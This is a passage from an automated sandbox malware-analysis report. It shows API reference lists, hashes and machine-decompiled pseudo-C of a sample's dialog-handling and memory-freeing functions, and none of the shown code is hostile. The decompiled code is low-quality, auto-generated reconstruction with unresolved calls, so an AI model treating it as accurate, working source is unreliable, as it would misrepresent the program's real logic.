                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004070CC
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004070D9
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004070E3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$AllocFree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 344208780-0
                                                                                                                              • Opcode ID: 0a6fde5ff11d48f0a236b1aef4f262c1706bbcabbcde46052c7aee7bd7a06b5c
                                                                                                                              • Instruction ID: 46bba15bca5ecc0c3d274959c06f823b2743354d29bf4852cfdaaeee7b8c3f8d
                                                                                                                              • Opcode Fuzzy Hash: 0a6fde5ff11d48f0a236b1aef4f262c1706bbcabbcde46052c7aee7bd7a06b5c
                                                                                                                              • Instruction Fuzzy Hash: 37E0E572A08305ABC720EB6AED40817F7ECAFA471070A882FF559D3260C6B4F8008A64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00971A99 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 00971AA2
                                                                                                                                • Part of subcall function 00975822: RtlFreeHeap.NTDLL(00000000,00000000,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?), ref: 00975838
                                                                                                                                • Part of subcall function 00975822: GetLastError.KERNEL32(?,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?,?), ref: 0097584A
                                                                                                                              • _free.LIBCMT ref: 00971AB5
                                                                                                                              • _free.LIBCMT ref: 00971AC6
                                                                                                                              • _free.LIBCMT ref: 00971AD7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: 6e825117f5f1e4ebec8962b3717789c7a5e4af2bece3bcb2a5eebd02991f591e
                                                                                                                              • Instruction ID: bdd8ab9e498ffebd308581d79b95d57604ca562edaeeb35c7c278c7252ba702c
                                                                                                                              • Opcode Fuzzy Hash: 6e825117f5f1e4ebec8962b3717789c7a5e4af2bece3bcb2a5eebd02991f591e
                                                                                                                              • Instruction Fuzzy Hash: CEE0EEB6829D209BD7422F10BC024893FA5FB987203A38406F00806325E773095AEBC2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00408950 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 361COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 39%
                                                                                                                              			E00408950(signed int __edx, void* __ebp, struct HWND__* _a4, intOrPtr _a8, signed short _a12, signed int _a16) {
				char _v4;
				char _v12;
				signed int _v16;
				char _v584;
				char _v596;
				char _v1076;
				char _v1108;
				char _v1560;
				char _v1564;
				char _v1572;
				char _v1580;
				char _v1584;
				char _v1608;
				intOrPtr _v1612;
				char _v1620;
				char _v1621;
				char _v1633;
				signed int _v1637;
				char _v1640;
				char _v1649;
				char _v1653;
				intOrPtr _v1668;
				char _v1684;
				intOrPtr _v1688;
				char _v1689;
				signed int _v1696;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				signed int _t68;
				void* _t72;
				char _t74;
				void* _t76;
				signed int _t79;
				signed int _t80;
				signed int _t83;
				void* _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t98;
				signed int _t100;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				void* _t110;
				intOrPtr* _t112;
				signed int _t115;
				signed int _t116;
				void* _t118;
				signed int _t119;
				void* _t121;
				void* _t124;
				intOrPtr* _t126;
				signed int _t127;
				void* _t130;
				signed int _t131;
				signed int _t135;
				signed int _t147;
				void* _t149;
				intOrPtr _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t165;
				signed int _t168;
				signed int _t174;
				signed int _t182;
				intOrPtr _t195;
				signed int _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				struct HWND__* _t200;
				intOrPtr _t201;
				signed int _t202;
				signed int _t205;
				intOrPtr* _t206;
				void* _t207;
				signed int _t208;
				char _t211;

				_t203 = __ebp;
				_t189 = __edx;
				_push(0xffffffff);
				_push(E00430366);
				_push( *[fs:0x0]);
				_t208 = _t207 - 0x64c;
				_t66 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t66 ^ _t208;
				_push(_t149);
				_push(__ebp);
				_t68 =  *0x43a6a8; // 0x2a5cd135
				_push(_t68 ^ _t208);
				 *[fs:0x0] =  &_v12;
				_t72 = _a8 - 0x10;
				_t200 = _a4;
				_t153 = _a16;
				if(_t72 == 0) {
					L59:
					_push(0);
					L60:
					EndDialog(_t200, ??);
					L61:
					_t74 = 1;
					L62:
					 *[fs:0x0] = _v12;
					_pop(_t195);
					_pop(_t201);
					_pop(_t150);
					return E0041B3F9(_t74, _t150, _v16 ^ _t208, _t189, _t195, _t201);
				}
				_t76 = _t72 - 0x100;
				if(_t76 == 0) {
					 *0x43bde0 = _t153;
					E00407D30(_t153, __eflags, _t200);
					goto L61;
				}
				if(_t76 == 1) {
					_t79 = _a12 & 0x0000ffff;
					__eflags = _t79 - 0x3fa;
					if(__eflags > 0) {
						_t80 = _t79 - 0x3fb;
						__eflags = _t80;
						if(_t80 == 0) {
							L9:
							_t158 =  *0x43bde0; // 0x0
							__eflags = _t158;
							if(__eflags != 0) {
								E00408510(_t158, _t203, __eflags);
							}
							goto L61;
						}
						__eflags = _t80 == 0xc;
						if(_t80 == 0xc) {
							_t83 =  *0x43bde0; // 0x0
							__eflags = _t83;
							if(_t83 != 0) {
								_push("\\");
								_t85 = E00408450(_t149,  *((intOrPtr*)(_t83 + 0x804)) + 4, __ebp,  &_v1608);
								_v4 = 0;
								E00408450(_t149,  *((intOrPtr*)(_t83 + 0x804)) + 4, __ebp,  &_v1580);
								_v4 = 2;
								E00404600( &_v1608);
								_t211 = _t208 + 0x18 - 0x1c;
								_t189 =  &_v1580;
								_v1620 = _t211;
								E00401E60(_t211,  &_v1580);
								E00418E00( &_v1580, __ebp, _t200, L"help\\conv_manually_adding_computers.html", _t85, L"hnv",  *((intOrPtr*)(_t83 + 0x804)) + 4);
								_t208 = _t211 + 0x24;
								E00404600( &_v1584);
							}
						}
						goto L61;
					}
					if(__eflags == 0) {
						_t92 =  *(E00404510() + 0x70);
						__eflags = _t92;
						if(_t92 == 0) {
							_t93 = 0;
							__eflags = 0;
						} else {
							_t93 =  *_t92(_t200, 0x3fa);
							_t208 = _t208 + 8;
						}
						_t94 =  *0x43babc(_t93, 0xf0, 0, 0);
						__eflags = _t94;
						_v1637 = _t94 != 0;
						_t96 =  *(E00404510() + 0x70);
						__eflags = _t96;
						if(_t96 == 0) {
							_t196 = 0;
							__eflags = 0;
						} else {
							_t107 =  *_t96(_t200, 0x3ee);
							_t208 = _t208 + 8;
							_t196 = _t107;
						}
						_t98 =  *(E00404510() + 0x70);
						__eflags = _t98;
						if(_t98 == 0) {
							_t205 = 0;
							__eflags = 0;
						} else {
							_t106 =  *_t98(_t200, 0x3ef);
							_t208 = _t208 + 8;
							_t205 = _t106;
						}
						_t100 =  *(E00404510() + 0x70);
						__eflags = _t100;
						if(_t100 == 0) {
							_t151 = 0;
							__eflags = 0;
						} else {
							_t105 =  *_t100(_t200, 0x3f8);
							_t208 = _t208 + 8;
							_t151 = _t105;
						}
						__eflags = _v1637;
						_t202 = 0 | _v1637 == 0x00000000;
						_t197 =  *0x43baa4; // 0x418f9c
						 *_t197(_t196, _t202);
						 *_t197(_t205, _t202);
						_t165 =  *0x43bde0; // 0x0
						__eflags = _t165;
						if(__eflags != 0) {
							E00408510(_t165, _t205, __eflags);
						}
						__eflags = _v1653;
						if(_v1653 != 0) {
							 *_t197(_t151, _t202);
						}
						goto L61;
					}
					_t108 = _t79 - 1;
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags =  *0x43bde0;
						if( *0x43bde0 == 0) {
							goto L61;
						} else {
							_t152 = 0;
							__eflags = 0;
							_v1612 = 0;
							_v1621 = 0;
							_t110 = E00407BD0(E00404510(), _t200, 0x3fb);
							_t198 =  *0x43bab0; // 0x418fc1
							 *_t198(_t110,  &_v1560, 0x100);
							_t112 =  &_v1572;
							_t189 = _t112 + 2;
							do {
								_t168 =  *_t112;
								_t112 = _t112 + 2;
								__eflags = _t168;
							} while (_t168 != 0);
							__eflags = _t112 - _t189;
							if(__eflags == 0) {
								goto L61;
							} else {
								_t115 =  *0x43bde0; // 0x0
								_t189 =  &_v1564;
								_t116 = E00401070( *((intOrPtr*)(_t115 + 0x804)), __eflags,  &_v1564);
								__eflags = _t116;
								if(_t116 != 0) {
									_t152 = 1;
									__eflags = E00407B80(E00404510(), _t200, 0x82, 0x83, 4, 0x10000, 0xffffffff, 0, 0, 0) - 6;
									if(__eflags == 0) {
										_t189 =  *0x43bde0; // 0x0
										_push(0);
										_v1633 = 1;
										E00402B50( *((intOrPtr*)(_t189 + 0x804)), _t189, __ebp, __eflags,  &_v1564);
									}
								}
								_t118 = E00407BD0(E00404510(), _t200, 0x3fa);
								_t206 =  *0x43babc; // 0x418f08
								_t119 =  *_t206(_t118, 0xf0, 0, 0);
								__eflags = _t119;
								if(_t119 == 0) {
									_t121 = E00407BD0(E00404510(), _t200, 0x3ee);
									 *_t198(_t121,  &_v1076, 0x100);
									_t124 = E00407BD0(E00404510(), _t200, 0x3ef);
									 *_t198(_t124,  &_v584, 0x100);
									_t126 =  &_v1108;
									_t189 = _t126 + 2;
									do {
										_t174 =  *_t126;
										_t126 = _t126 + 2;
										__eflags = _t174;
									} while (_t174 != 0);
									_t127 = _t126 - _t189;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L61;
									}
									_v1668 = 0;
									_t130 = E00407BD0(E00404510(), _t200, 0x3f8);
									_t131 =  *_t206(_t130, 0xf0, 0, 0);
									__eflags = _t131;
									_t189 = _t189 & 0xffffff00 | _t131 != 0x00000000;
									__eflags = _t152;
									_v1696 = _t189;
									if(__eflags != 0) {
										__eflags = _v1689;
										if(__eflags != 0) {
											_t135 =  *0x43bde0; // 0x0
											_t189 =  &_v1620;
											E004013C0( *((intOrPtr*)(_t135 + 0x804)),  &_v1620, __eflags,  &_v1620,  &_v1108,  &_v596);
										}
									} else {
										_t189 =  *0x43bde0; // 0x0
										E004029A0( *((intOrPtr*)(_t189 + 0x804)), _t189, _t206, __eflags,  &_v1620,  &_v1108,  &_v596, _v1688, 0,  &_v1684);
									}
									__eflags = _v1684 - 0xffffffff;
									if(_v1684 != 0xffffffff) {
										L35:
										__eflags = _v1689;
										if(_v1689 != 0) {
											L37:
											_push(1);
											goto L60;
										}
										__eflags = _t152;
										if(_t152 != 0) {
											goto L61;
										}
										goto L37;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0xffffffff);
										_push(0x10000);
										L34:
										_push(0);
										_push(0x83);
										_push(0x81);
										_push(_t200);
										E00407B80(E00404510());
										goto L61;
									}
								}
								__eflags = _t152;
								if(__eflags != 0) {
									__eflags = _v1649;
									if(__eflags != 0) {
										_t182 =  *0x43bde0; // 0x0
										E004013C0( *((intOrPtr*)(_t182 + 0x804)), _t189, __eflags,  &_v1580, 0, 0);
									}
								} else {
									_t189 =  *0x43bde0; // 0x0
									E004029A0( *((intOrPtr*)(_t189 + 0x804)), _t189, _t206, __eflags,  &_v1580, 0, 0, 0, 0,  &_v1640);
								}
								__eflags = _v1640 - 0xffffffff;
								if(_v1640 != 0xffffffff) {
									goto L35;
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(0xffffffff);
									_push(0);
									goto L34;
								}
							}
						}
					}
					_t147 = _t108 - 1;
					__eflags = _t147;
					if(_t147 == 0) {
						goto L59;
					}
					__eflags = _t147 != 0x3ec;
					if(_t147 != 0x3ec) {
						goto L61;
					}
					goto L9;
				} else {
					_t74 = 0;
					goto L62;
				}
			}























































































                                                                                                                              0x00408950
                                                                                                                              0x00408950
                                                                                                                              0x00408950
                                                                                                                              0x00408952
                                                                                                                              0x0040895d
                                                                                                                              0x0040895e
                                                                                                                              0x00408964
                                                                                                                              0x0040896b
                                                                                                                              0x00408972
                                                                                                                              0x00408973
                                                                                                                              0x00408976
                                                                                                                              0x0040897d
                                                                                                                              0x00408985
                                                                                                                              0x00408992
                                                                                                                              0x00408995
                                                                                                                              0x0040899c
                                                                                                                              0x004089a3
                                                                                                                              0x00408dfa
                                                                                                                              0x00408dfa
                                                                                                                              0x00408dfc
                                                                                                                              0x00408dfd
                                                                                                                              0x00408e03
                                                                                                                              0x00408e03
                                                                                                                              0x00408e08
                                                                                                                              0x00408e0f
                                                                                                                              0x00408e17
                                                                                                                              0x00408e18
                                                                                                                              0x00408e1a
                                                                                                                              0x00408e2f
                                                                                                                              0x00408e2f
                                                                                                                              0x004089a9
                                                                                                                              0x004089ae
                                                                                                                              0x00408ded
                                                                                                                              0x00408df3
                                                                                                                              0x00000000
                                                                                                                              0x00408df3
                                                                                                                              0x004089b7
                                                                                                                              0x004089c0
                                                                                                                              0x004089c8
                                                                                                                              0x004089cd
                                                                                                                              0x00408d57
                                                                                                                              0x00408d57
                                                                                                                              0x00408d5c
                                                                                                                              0x004089f2
                                                                                                                              0x004089f2
                                                                                                                              0x004089f8
                                                                                                                              0x004089fa
                                                                                                                              0x00408a00
                                                                                                                              0x00408a00
                                                                                                                              0x00000000
                                                                                                                              0x004089fa
                                                                                                                              0x00408d62
                                                                                                                              0x00408d65
                                                                                                                              0x00408d6b
                                                                                                                              0x00408d70
                                                                                                                              0x00408d72
                                                                                                                              0x00408d7e
                                                                                                                              0x00408d8c
                                                                                                                              0x00408d9c
                                                                                                                              0x00408da7
                                                                                                                              0x00408db3
                                                                                                                              0x00408dbb
                                                                                                                              0x00408dc5
                                                                                                                              0x00408dc8
                                                                                                                              0x00408dce
                                                                                                                              0x00408dd3
                                                                                                                              0x00408dd9
                                                                                                                              0x00408dde
                                                                                                                              0x00408de5
                                                                                                                              0x00408de5
                                                                                                                              0x00408d72
                                                                                                                              0x00000000
                                                                                                                              0x00408d65
                                                                                                                              0x004089d3
                                                                                                                              0x00408c97
                                                                                                                              0x00408c9a
                                                                                                                              0x00408c9c
                                                                                                                              0x00408cab
                                                                                                                              0x00408cab
                                                                                                                              0x00408c9e
                                                                                                                              0x00408ca4
                                                                                                                              0x00408ca6
                                                                                                                              0x00408ca6
                                                                                                                              0x00408cb7
                                                                                                                              0x00408cbd
                                                                                                                              0x00408cbf
                                                                                                                              0x00408cc9
                                                                                                                              0x00408ccc
                                                                                                                              0x00408cce
                                                                                                                              0x00408cdf
                                                                                                                              0x00408cdf
                                                                                                                              0x00408cd0
                                                                                                                              0x00408cd6
                                                                                                                              0x00408cd8
                                                                                                                              0x00408cdb
                                                                                                                              0x00408cdb
                                                                                                                              0x00408ce6
                                                                                                                              0x00408ce9
                                                                                                                              0x00408ceb
                                                                                                                              0x00408cfc
                                                                                                                              0x00408cfc
                                                                                                                              0x00408ced
                                                                                                                              0x00408cf3
                                                                                                                              0x00408cf5
                                                                                                                              0x00408cf8
                                                                                                                              0x00408cf8
                                                                                                                              0x00408d03
                                                                                                                              0x00408d06
                                                                                                                              0x00408d08
                                                                                                                              0x00408d19
                                                                                                                              0x00408d19
                                                                                                                              0x00408d0a
                                                                                                                              0x00408d10
                                                                                                                              0x00408d12
                                                                                                                              0x00408d15
                                                                                                                              0x00408d15
                                                                                                                              0x00408d1d
                                                                                                                              0x00408d24
                                                                                                                              0x00408d28
                                                                                                                              0x00408d2e
                                                                                                                              0x00408d32
                                                                                                                              0x00408d34
                                                                                                                              0x00408d3a
                                                                                                                              0x00408d3c
                                                                                                                              0x00408d3e
                                                                                                                              0x00408d3e
                                                                                                                              0x00408d43
                                                                                                                              0x00408d48
                                                                                                                              0x00408d50
                                                                                                                              0x00408d50
                                                                                                                              0x00000000
                                                                                                                              0x00408d48
                                                                                                                              0x004089d9
                                                                                                                              0x004089d9
                                                                                                                              0x004089dc
                                                                                                                              0x00408a0a
                                                                                                                              0x00408a11
                                                                                                                              0x00000000
                                                                                                                              0x00408a17
                                                                                                                              0x00408a1c
                                                                                                                              0x00408a1c
                                                                                                                              0x00408a1f
                                                                                                                              0x00408a27
                                                                                                                              0x00408a32
                                                                                                                              0x00408a37
                                                                                                                              0x00408a48
                                                                                                                              0x00408a4a
                                                                                                                              0x00408a4e
                                                                                                                              0x00408a51
                                                                                                                              0x00408a51
                                                                                                                              0x00408a54
                                                                                                                              0x00408a57
                                                                                                                              0x00408a57
                                                                                                                              0x00408a5c
                                                                                                                              0x00408a60
                                                                                                                              0x00000000
                                                                                                                              0x00408a66
                                                                                                                              0x00408a66
                                                                                                                              0x00408a71
                                                                                                                              0x00408a76
                                                                                                                              0x00408a7b
                                                                                                                              0x00408a7d
                                                                                                                              0x00408a99
                                                                                                                              0x00408aa7
                                                                                                                              0x00408aaa
                                                                                                                              0x00408aac
                                                                                                                              0x00408ab2
                                                                                                                              0x00408abf
                                                                                                                              0x00408ac3
                                                                                                                              0x00408ac3
                                                                                                                              0x00408aaa
                                                                                                                              0x00408ade
                                                                                                                              0x00408ae3
                                                                                                                              0x00408aea
                                                                                                                              0x00408aec
                                                                                                                              0x00408aee
                                                                                                                              0x00408b61
                                                                                                                              0x00408b74
                                                                                                                              0x00408b83
                                                                                                                              0x00408b96
                                                                                                                              0x00408b98
                                                                                                                              0x00408b9f
                                                                                                                              0x00408ba2
                                                                                                                              0x00408ba2
                                                                                                                              0x00408ba5
                                                                                                                              0x00408ba8
                                                                                                                              0x00408ba8
                                                                                                                              0x00408bad
                                                                                                                              0x00408bad
                                                                                                                              0x00408bb1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00408bbd
                                                                                                                              0x00408bcc
                                                                                                                              0x00408bdb
                                                                                                                              0x00408bdd
                                                                                                                              0x00408bdf
                                                                                                                              0x00408be2
                                                                                                                              0x00408be4
                                                                                                                              0x00408be8
                                                                                                                              0x00408c1e
                                                                                                                              0x00408c23
                                                                                                                              0x00408c2d
                                                                                                                              0x00408c40
                                                                                                                              0x00408c45
                                                                                                                              0x00408c45
                                                                                                                              0x00408bea
                                                                                                                              0x00408bfe
                                                                                                                              0x00408c17
                                                                                                                              0x00408c17
                                                                                                                              0x00408c4a
                                                                                                                              0x00408c4f
                                                                                                                              0x00408c7c
                                                                                                                              0x00408c7c
                                                                                                                              0x00408c81
                                                                                                                              0x00408c8b
                                                                                                                              0x00408c8b
                                                                                                                              0x00000000
                                                                                                                              0x00408c8b
                                                                                                                              0x00408c83
                                                                                                                              0x00408c85
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00408c51
                                                                                                                              0x00408c51
                                                                                                                              0x00408c53
                                                                                                                              0x00408c55
                                                                                                                              0x00408c57
                                                                                                                              0x00408c59
                                                                                                                              0x00408c5e
                                                                                                                              0x00408c5e
                                                                                                                              0x00408c60
                                                                                                                              0x00408c65
                                                                                                                              0x00408c6a
                                                                                                                              0x00408c72
                                                                                                                              0x00000000
                                                                                                                              0x00408c72
                                                                                                                              0x00408c4f
                                                                                                                              0x00408af0
                                                                                                                              0x00408af2
                                                                                                                              0x00408b19
                                                                                                                              0x00408b1e
                                                                                                                              0x00408b20
                                                                                                                              0x00408b35
                                                                                                                              0x00408b35
                                                                                                                              0x00408af4
                                                                                                                              0x00408af4
                                                                                                                              0x00408b12
                                                                                                                              0x00408b12
                                                                                                                              0x00408b3a
                                                                                                                              0x00408b3f
                                                                                                                              0x00000000
                                                                                                                              0x00408b45
                                                                                                                              0x00408b45
                                                                                                                              0x00408b47
                                                                                                                              0x00408b49
                                                                                                                              0x00408b4b
                                                                                                                              0x00408b4d
                                                                                                                              0x00000000
                                                                                                                              0x00408b4d
                                                                                                                              0x00408b3f
                                                                                                                              0x00408a60
                                                                                                                              0x00408a11
                                                                                                                              0x004089de
                                                                                                                              0x004089de
                                                                                                                              0x004089e1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004089e7
                                                                                                                              0x004089ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004089b9
                                                                                                                              0x004089b9
                                                                                                                              0x00000000
                                                                                                                              0x004089b9

                                                                                                                              APIs
                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00408DFD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Dialog
                                                                                                                              • String ID: help\conv_manually_adding_computers.html$hnv
                                                                                                                              • API String ID: 1120787796-3607114703
                                                                                                                              • Opcode ID: 1ce0679d3304f4368af87c8b17f184ba74fcd3933fd6a5755a9b28140febb8e3
                                                                                                                              • Instruction ID: 0551d20d1e2b963981968c06ef7f5083528537d6048941f6edc578a681fc1eeb
                                                                                                                              • Opcode Fuzzy Hash: 1ce0679d3304f4368af87c8b17f184ba74fcd3933fd6a5755a9b28140febb8e3
                                                                                                                              • Instruction Fuzzy Hash: C4C1E9702483016BE624EB34DD46FAB7294AF84714F14093EF281B72D1DEBCA945C79E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00408510 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 356COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 56%
                                                                                                                              			E00408510(char __ecx, void* __ebp, void* __eflags) {
				char _v12;
				signed int _v16;
				signed int _v24;
				intOrPtr _v32;
				signed int _v36;
				char _v540;
				char _v552;
				char _v1040;
				char _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				intOrPtr _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				char _v1080;
				signed int* _v1084;
				char _v1085;
				signed int _v1088;
				char _v1092;
				void* _v1096;
				signed char _v1097;
				char _v1098;
				char _v1100;
				intOrPtr _v1104;
				char _v1106;
				char _v1108;
				char* _v1112;
				intOrPtr _v1116;
				char _v1118;
				intOrPtr _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t117;
				signed int _t119;
				intOrPtr* _t123;
				void* _t124;
				intOrPtr* _t126;
				signed int* _t130;
				signed int* _t132;
				signed int _t137;
				intOrPtr* _t143;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t154;
				signed int* _t158;
				signed int* _t160;
				intOrPtr* _t164;
				signed int _t165;
				intOrPtr* _t171;
				struct HWND__* _t174;
				signed int _t175;
				signed int* _t176;
				signed int* _t177;
				signed int* _t178;
				struct HWND__* _t180;
				signed int _t181;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;
				signed int* _t185;
				void* _t187;
				signed int _t188;
				signed char _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				signed int _t192;
				signed int _t193;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr _t199;
				intOrPtr _t203;
				intOrPtr _t208;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				void* _t219;
				signed int* _t221;
				signed int _t223;
				void* _t226;
				signed int* _t227;
				signed int _t229;
				void* _t231;
				signed int _t232;
				intOrPtr _t233;
				void* _t234;
				intOrPtr _t235;
				intOrPtr _t237;
				signed int* _t238;
				void* _t239;
				intOrPtr _t240;
				struct HWND__* _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				signed int* _t244;
				void* _t245;
				intOrPtr _t246;
				struct HWND__* _t247;
				char* _t250;
				char* _t252;
				intOrPtr _t253;
				void* _t254;
				signed int _t255;
				signed int _t256;

				_push(0xffffffff);
				_push(E0043031B);
				_push( *[fs:0x0]);
				_t255 = _t254 - 0x434;
				_t117 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t117 ^ _t255;
				_push(_t187);
				_t119 =  *0x43a6a8; // 0x2a5cd135
				_push(_t119 ^ _t255);
				 *[fs:0x0] =  &_v12;
				_t237 =  *((intOrPtr*)(__ecx + 0x800));
				_v1080 = __ecx;
				_v1085 = 1;
				_t123 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t123 == 0) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_t124 =  *_t123(_t237, 0x3fb);
					_t255 = _t255 + 8;
				}
				 *0x43bab0(_t124,  &_v1040, 0x100);
				_t126 =  &_v1052;
				_v1056 = 7;
				_v1060 = 0;
				_v1076 = 0;
				_t219 = _t126 + 2;
				do {
					_t196 =  *_t126;
					_t126 = _t126 + 2;
				} while (_t196 != 0);
				E00401D80(_t187,  &_v1080,  &_v1052, _t126 - _t219 >> 1);
				_t198 = _v1064;
				_t221 = _v1084;
				_v24 = 0;
				_v1104 = 0x20;
				_t130 = _t221;
				if(_t198 < 8) {
					_t130 =  &_v1076;
				}
				_t188 = _v1060;
				_t231 = _t130 + _t188 * 2;
				if(_t231 == 0) {
					L14:
					E0041AD33();
					_t198 = _v1056;
					_t188 = _v1060;
					_t221 = _v1076;
					goto L15;
				} else {
					_t184 = _t221;
					if(_t198 < 8) {
						_t184 =  &_v1076;
					}
					if(_t184 > _t231) {
						goto L14;
					} else {
						_t185 = _t221;
						if(_t198 < 8) {
							_t185 =  &_v1076;
						}
						if(_t231 <= _t185 + _t188 * 2) {
							L15:
							_t250 =  &_v1080;
							if(_t198 < 8) {
								_t238 =  &_v1076;
								L17:
								_t132 = _t221;
								if(_t198 < 8) {
									_t132 =  &_v1076;
								}
								if(_t132 > _t238) {
									L23:
									E0041AD33();
									goto L24;
								} else {
									_t183 = _t221;
									if(_t198 < 8) {
										_t183 =  &_v1076;
									}
									if(_t238 <= _t183 + _t188 * 2) {
										L24:
										E004083A0( &_v1088,  &_v1080, _t238, _t250, _t231,  &_v1096);
										_t199 = _v1056;
										_t232 = _v1076;
										_t256 = _t255 + 0x18;
										_t137 = _t232;
										if(_t199 < 8) {
											_t137 =  &_v1076;
										}
										_t223 = _v1060;
										_t239 = _t137 + _t223 * 2;
										if(_t239 == 0) {
											L33:
											E0041AD33();
											goto L34;
										} else {
											_t181 = _t232;
											if(_t199 < 8) {
												_t181 =  &_v1076;
											}
											if(_t181 > _t239) {
												goto L33;
											} else {
												_t182 = _t232;
												if(_t199 < 8) {
													_t182 =  &_v1076;
												}
												if(_t239 <= _t182 + _t223 * 2) {
													L34:
													E004081D0( &_v1080, _t250,  &_v1088, _v1088, _v1084,  &_v1080, _t239);
													_t225 = _v1112;
													_t240 =  *((intOrPtr*)(_v1112 + 0x800));
													_v1118 = _v1080 != 0;
													_t143 =  *((intOrPtr*)(E00404510() + 0x70));
													if(_t143 == 0) {
														_t241 = 0;
														__eflags = 0;
													} else {
														_t180 =  *_t143(_t240, 0x3ee);
														_t256 = _t256 + 8;
														_t241 = _t180;
													}
													if(IsWindowEnabled(_t241) == 0) {
														_t189 = _v1097;
														goto L77;
													} else {
														 *0x43bab0(_t241,  &_v540, 0x100);
														_t154 =  &_v552;
														_t226 = _t154 + 2;
														do {
															_t208 =  *_t154;
															_t154 = _t154 + 2;
														} while (_t208 != 0);
														E00401D80(_t188,  &_v1092,  &_v552, _t154 - _t226 >> 1);
														_t211 = _v1076;
														_t227 = _v1096;
														_v1116 = 0x20;
														_t158 = _t227;
														if(_t211 < 8) {
															_t158 =  &_v1088;
														}
														_t192 = _v1072;
														_t234 = _t158 + _t192 * 2;
														if(_t234 == 0) {
															L50:
															E0041AD33();
															_t211 = _v1068;
															_t192 = _v1072;
															_t227 = _v1088;
															goto L51;
														} else {
															_t177 = _t227;
															if(_t211 < 8) {
																_t177 =  &_v1088;
															}
															if(_t177 > _t234) {
																goto L50;
															} else {
																_t178 = _t227;
																if(_t211 < 8) {
																	_t178 =  &_v1088;
																}
																if(_t234 <= _t178 + _t192 * 2) {
																	L51:
																	_t252 =  &_v1092;
																	if(_t211 < 8) {
																		_t244 =  &_v1088;
																		L53:
